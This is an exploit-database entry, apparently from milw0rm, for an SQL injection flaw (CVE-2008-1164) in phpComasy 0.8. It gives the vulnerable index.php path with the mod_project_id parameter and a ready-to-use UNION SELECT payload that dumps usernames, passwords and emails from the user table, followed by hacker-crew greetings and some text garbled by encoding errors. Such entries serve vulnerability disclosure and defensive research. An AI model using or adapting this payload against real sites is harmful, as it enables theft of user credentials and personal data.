phpComasy 0.8 - 'mod_project_id' SQL Injection

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-02-29 
date_updated: 2016-11-15 
verified: 1 
codes: OSVDB-43072;CVE-2008-1164 
tags: 
aliases:  
screenshot_url:  
application_url:

By Cr@zy_King / crazy_kinq@hotmail.co.uk

phpComasy 0.8 (mod_project_id) Remote Sql Ä°nj. Vuln

Script Down : http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9

Page : index.php?id=7&mod_action=project_detail&mod_project_id=Sql.

Exp : -9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user

Not : HiÃ§kimse Kendini pahalÄ± Zannetmesin Hepinizin Ä°ndirim GÃ¼nÃ¼nÃ¼ Biliyorum ;)

Hackshow.us / Hack Bir Showdur.

Greatz : Eno7 - Crackers_Child - Thehacker - Ghost61 - Tilkiandre - Edoras - The_Bekir - DreamTurk

Special Greatz : str0ke and SuSkun (since 2003 :) HoÅŸgeldin Suskun Abi.

# milw0rm.com [2008-03-01]